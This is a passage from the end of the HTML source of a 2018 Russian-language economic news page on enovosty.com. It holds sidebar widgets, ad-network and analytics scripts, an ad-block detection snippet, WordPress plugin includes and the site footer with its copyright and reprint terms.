}));};tag.parentNode.insertBefore(script, tag);})();</script></div></div> </div><br><div><a href="https://enovosty.com/politika/full/609-tramp-i-makron-sopernichayut-za-blagosklonnost-putina"><img alt="Трамп и Макрон" src="https://enovosty.com/wp-content/themes/eizvestia/img/02_Svedenie.gif"></a></div></br><link rel="stylesheet" type="text/css" href="https://s1.gismeteo.ua/static/css/informer2/gs_informerClient.min.css"><div id="gsInformerID-RpMlQd24Vh0i0g" class="gsInformer" style="width:300px;height:168px"> <div class="gsIContent"> <div id="cityLink"> <a href="https://www.gismeteo.ua/weather-kyiv-4944/" title="Погода в Киеве" target="_blank"> <img src="https://s1.gismeteo.ua/static/images/gisloader.svg" width="24" height="24" alt="Погода в Киеве"> </a> </div> <div class="gsLinks"> <table> <tr> <td> <div class="leftCol"> <a href="https://www.gismeteo.ua" target="_blank" title="Погода"> <img alt="Погода" src="https://s1.gismeteo.ua/static/images/informer2/logo-mini2.png" align="middle" border="0" height="16" width="11"/> <img src="https://s1.gismeteo.ua/static/images/gismeteo.svg" border="0" align="middle" style="left: 5px; top:1px"> </a> </div> <div class="rightCol"> <a href="https://www.gismeteo.ua/weather-kyiv-4944/14-days/" target="_blank" title="Погода в Киеве на 2 недели"> <img src="https://s1.gismeteo.ua/static/images/informer2/forecast-2weeks.ru.svg" border="0" align="middle" style="top:auto" alt="Погода в Киеве на 2 недели"> </a> </div> </td> </tr> </table> </div> </div></div><script src="https://www.gismeteo.ua/ajax/getInformer/?hash=RpMlQd24Vh0i0g" type="text/javascript"></script></br><div id="adpartner-jsunit-4125"> <script type="text/javascript">var head = document.getElementsByTagName('head')[0];var script = document.createElement('script');script.type = 'text/javascript';script.src = "//a4p.adpartner.pro/jsunit?id=4125&ref=" + encodeURIComponent(document.referrer) + "&" + Math.random();
head.appendChild(script);</script></div><div class="wiget simple_pr socnet"><div class="caption"><p>Последние новости в соцсетях</p></div> <table><tr><td><a href="https://www.facebook.com/enovosty/" rel="nofollow" target="_blank" class="facebook"><i></i></a></td><td><a href="https://twitter.com/enovosty" rel="nofollow" target="_blank" class="twitter"><i></i></a></td><td><a href="https://plus.google.com/104224979035578149686" rel="nofollow" target="_blank" class="gplus"><i></i></a></td></tr></table></div><br><script charset="windows-1251" src="//i.mediatraffic.com.ua/js/uho/mt20_3.js"></script><div id="300-588"></div><script type="text/javascript">new MTr('300-588', {site:907,format:0});</script><div id="riainfo_015d2e7c4ce2cda608aa710275088255" onclick="trackOutboundLink(this, 'DomRia', 'dom.ria.com');"></div> <div class="wiget ukr_links" style="font-size:9px; color:#336699;"> </div> <a style="margin-bottom:5px;display: inline-block;" href="https://www.bigmir.net/" target="_blank" onClick='img=new Image();img.src="//www.bigmir.net/?cl=101585";'><img src="//c.bigmir.net/?s101585&t8&l1" width="88" height="31" alt="bigmir)net TOP 100" title="bigmir)net TOP 100"></a> <div class="links_bal" style="width:240px;"></div><div class="links_bal" style="width:240px;"></div>  <div class="wiget ukr_links" style="font-size:9px; color:#336699;"> </div></div><div class="cls"></div><script>
window.onload = function() {
// Delay to allow the async Google Ads to load
setTimeout(function() {
// Get the first AdSense ad unit on the page
var ad = document.querySelector("ins.adsbygoogle");
// If the ads are not loaded, track the event
if (ad && ad.innerHTML.replace(/\s/g, "").length == 0) {if (typeof ga !== 'undefined') {// Log an event in Universal Analytics
// but without affecting overall bounce rate
ga('send', 'event', 'Adblock', 'Yes', {'nonInteraction': 1});} else if (typeof _gaq !== 'undefined') {// Log a non-interactive event in old Google Analytics
_gaq.push(['_trackEvent', 'Adblock', 'Yes', undefined, undefined, true]);}}}, 2000); // Run ad block detection 2 seconds after page load
};
</script> </div> <!-- start NEW_content_v1 for enovosty.com <div id="adpartner-jsunit-3430"> <script type="text/javascript">var head = document.getElementsByTagName('head')[0];var script = document.createElement('script');script.type = 'text/javascript';script.src = "//a4p.adpartner.pro/jsunit?id=3430&ref=" + encodeURIComponent(document.referrer) + "&" + Math.random();
head.appendChild(script);</script></div> end NEW_content_v1 for enovosty.com --><div class="cls"></div><br> <div id="footer"> <div class="wiget text" style="padding-right:0; margin-right:0;" > <div id="bottom-menu" style="background: #F93; height:40px"> <a style="display: inline-block; vertical-align: top;" href="https://enovosty.com/contacts">КОНТАКТЫ</a>|<a style="display: inline-block; width: 220px;vertical-align: top;" href="https://enovosty.com/politika-konfididencijnosti-ta-zaxistu-personalnix-danix">Политика конфиденциальности<br>и защиты персональных данных</a>|<a style="display: inline-block; vertical-align: top;" href="https://enovosty.com/redakcionnaya-politika">Редакционная политика</a>|<a style="display: inline-block; vertical-align: top;" href="https://enovosty.com/newsitemap">Карта сайта</a> </div> <div id="counters" > </div> <div id="textfooter"> <p>2018 &copy; "Экономические новости"</p> <p>Все права защищены. </p><p>Использование материалов разрешается при условии ссылки на <a href="https://enovosty.com" style="color:#336699; text-decoration:underline;">"Экономические новости"</a> (www.enovosty.com). Для интернет-изданий обязательной является прямая гиперссылка, не закрытая от индексации поисковыми системами (отсутствие в ссылке rel="nofollow" или "noindex" ), в первом или втором абзаце опубликованного материала (ссылка должна быть в тексте) на цитируемую статью или новость. Материалы, обозначенные символом <img style="margin-bottom:-3px" src="https://enovosty.com/wp-content/themes/eizvestia/img/reklama.png" width="16" height="14" alt="" />, публикуются на правах рекламы. <br />Производство онлайн-департамента газеты "Экономические новости" (www.enovosty.com).</p> </div>  <a href="/contacts" target="_blank" rel="nofollow" style="
float: right;
font-weight: bold;
color: #369;
padding: 10px;
">Размещение рекламы</a> </div> </div> <div class="links_bal"> </div></div><script src="https://enovosty.com/wp-content/themes/eizvestia/js/eishare.js?v=4"></script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/afk.js"></script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/mailto.js"></script><div id="error-notification-id" class="enp-4773462"></div><div id="error-notification-settings" style="display: none;"><p>Спасибо большое за Вашу помощь. Мы исправим ошибку в ближайшее время!</p></div> <script>var isProcessing = false;function alter_ul_post_values(obj,post_id,ul_type){if (isProcessing)
return;isProcessing = true;jQuery(obj).find("span").html("..");jQuery.ajax({type: "POST",url: window.location.origin + "/wp-content/plugins/like-dislike-counter-for-posts-pages-and-comments/ajax_counter.php",data: "post_id="+post_id+"&up_type="+ul_type,success: function(msg){jQuery(obj).find("span").html(msg);isProcessing = false;}});}</script> <link rel='stylesheet' id='wsl-widget-css' href='https://enovosty.com/wp-content/plugins/wordpress-social-login/assets/css/style.css' type='text/css' media='all' /><script type='text/javascript'>
var enp = {"ajaxurl":"\/wp-admin\/admin-ajax.php","barBackground":"#ff9933","barPosition":"bottom","barTextColor":"#ffffff","baseurl":"https:\/\/enovosty.com","confirmation":"1","cbTitle":"Are you sure?","cbError":"Error","cbOK":"OK","cbCancel":"Cancel"};
</script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/error-notification/error_notifi.min.js'></script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/ajax-comment-loading/js/google-acl2.js'></script><script type='text/javascript'>
var pollsL10n = {"ajax_url":"https:\/\/enovosty.com\/wp-admin\/admin-ajax.php","text_wait":"\u0412\u0430\u0448 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0439 \u0437\u0430\u043f\u0440\u043e\u0441 \u0432\u0441\u0435 \u0435\u0449\u0435 \u043e\u0431\u0440\u0430\u0431\u0430\u0442\u044b\u0432\u0430\u0435\u0442\u0441\u044f. \u041f\u043e\u0436\u0430\u043b\u0443\u0439\u0441\u0442\u0430, \u043f\u043e\u0434\u043e\u0436\u0434\u0438\u0442\u0435\u2026","text_valid":"\u041f\u043e\u0436\u0430\u043b\u0443\u0439\u0441\u0442\u0430, \u0432\u044b\u0431\u0435\u0440\u0438\u0442\u0435 \u0434\u043e\u043f\u0443\u0441\u0442\u0438\u043c\u044b\u0439 \u0432\u0430\u0440\u0438\u0430\u043d\u0442 \u043e\u0442\u0432\u0435\u0442\u0430.","text_multiple":"\u041c\u0430\u043a\u0441\u0438\u043c\u0430\u043b\u044c\u043d\u043e\u0435 \u0440\u0430\u0437\u0440\u0435\u0448\u0451\u043d\u043d\u043e\u0435 \u043a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u043e \u0432\u044b\u0431\u0438\u0440\u0430\u0435\u043c\u044b\u0445 \u0432\u0430\u0440\u0438\u0430\u043d\u0442\u043e\u0432:","show_loading":"1","show_fading":"1"};
</script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/wp-polls/polls.js'></script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/clearfy/components/comments-plus/assets/js/url-span.js'></script><script type='text/javascript'>
var socialWarfare = {"addons":[],"post_id":"4773462","floatBeforeContent":""};
</script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/social-warfare/assets/js/script.min.js'></script><script type='text/javascript' src='https://enovosty.com/wp-includes/js/wp-embed.min.js'></script><script type='text/javascript'>
var icl_vars = {"current_language":"ru","icl_home":"https:\/\/enovosty.com\/","ajax_url":"https:\/\/enovosty.com\/wp-admin\/admin-ajax.php","url_type":"1"};
</script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/sitepress-multilingual-cms/res/js/sitepress_js.js'></script><script type='text/javascript' src='https://enovosty.com/wp-includes/js/comment-reply.min.js'></script><script type="text/javascript"> var swp_nonce = "33fab8887f";var swpFloatBeforeContent = false;var swpClickTracking = false;</script><script>//new adriver("adriver_banner_A1", {sid:101080,sz:"A1", bt:52,pz:1,bn:0});
new adriver("adriver_banner_B4", {sid:101080,sz:"B4", bt:52,pz:2,bn:1});new adriver("adriver_banner_C1", {sid: 101080, sz: "C1", pz: 1, bn: 1, bt:52});//new adriver("adriver_banner_C2", {sid: 101080, sz: "C2", pz: 2, bn: 2, bt:52});
new adriver("adriver_banner_C3", {sid: 101080, sz: "C3", pz: 2, bn: 3, bt:52});new adriver("adriver_banner_branding", {sid: 101080, sz: "branding", bt:52});//new adriver("adriver_banner_1964215071", {sid:101080, bt:52, sz:'contentroll'});
</script><script>document.getElementById('logo').style.filter = "progid:DXImageTransform.Microsoft.AlphaImageLoader(...)";//img.style.filter = "progid:DXImageTransform.Microsoft.AlphaImageLoader(...)";
</script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/iepngfix.min.js" ></script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/png_fix.js" ></script><script>//var pollsL10n = document.getElementById('pollsL10n');
</script><!--<script type="text/javascript">admixerML.fn.push(function () {admixerML.defineSlot({z: '0e893395-4b69-455a-9d7a-6bc8d2aa074f',ph: 'admixer_0e8933954b69455a9d7a6bc8d2aa074f_zone_9056_sect_1082_site_1069',i: 'inv-nets'
});admixerML.singleRequest();});</script>--><div id='admixer_0e8933954b69455a9d7a6bc8d2aa074f_zone_9056_sect_1082_site_1069'></div><script>admixerML.fn.push(function () { admixerML.display('admixer_0e8933954b69455a9d7a6bc8d2aa074f_zone_9056_sect_1082_site_1069'); });</script><!--<script type="text/javascript" charset="utf-8">(function(d,s){var o=d.createElement(s);o.async=true;o.type="text/javascript";o.charset="utf-8";if (location.protocol == "https:")
{ o.src="https://js-ru.redtram.com/n4p/0/30/ticker_30546.js"; }else
{ o.src="https://js.ru.redtram.com/n4p/0/30/ticker_30546.js"; }var x=d.getElementsByTagName(s)[0];x.parentNode.insertBefore(o,x);})(document,"script");</script>
--><script>jQuery(document).ready(function($){setTimeout(function() { ah2 = $("body .container").height(); $("#brandingimg").css('height', ah2 + 'px'); }, 2500);});</script><script src="https://affiliate.ria.com/js/ria_informer.js?riacode=015d2e7c4ce2cda608aa710275088255" async></script><div id="bfooter" style="width:1004px;margin:0 auto;position: relative;padding: 0 10px;display: block;text-align:left;">&nbsp;</div> </body></html>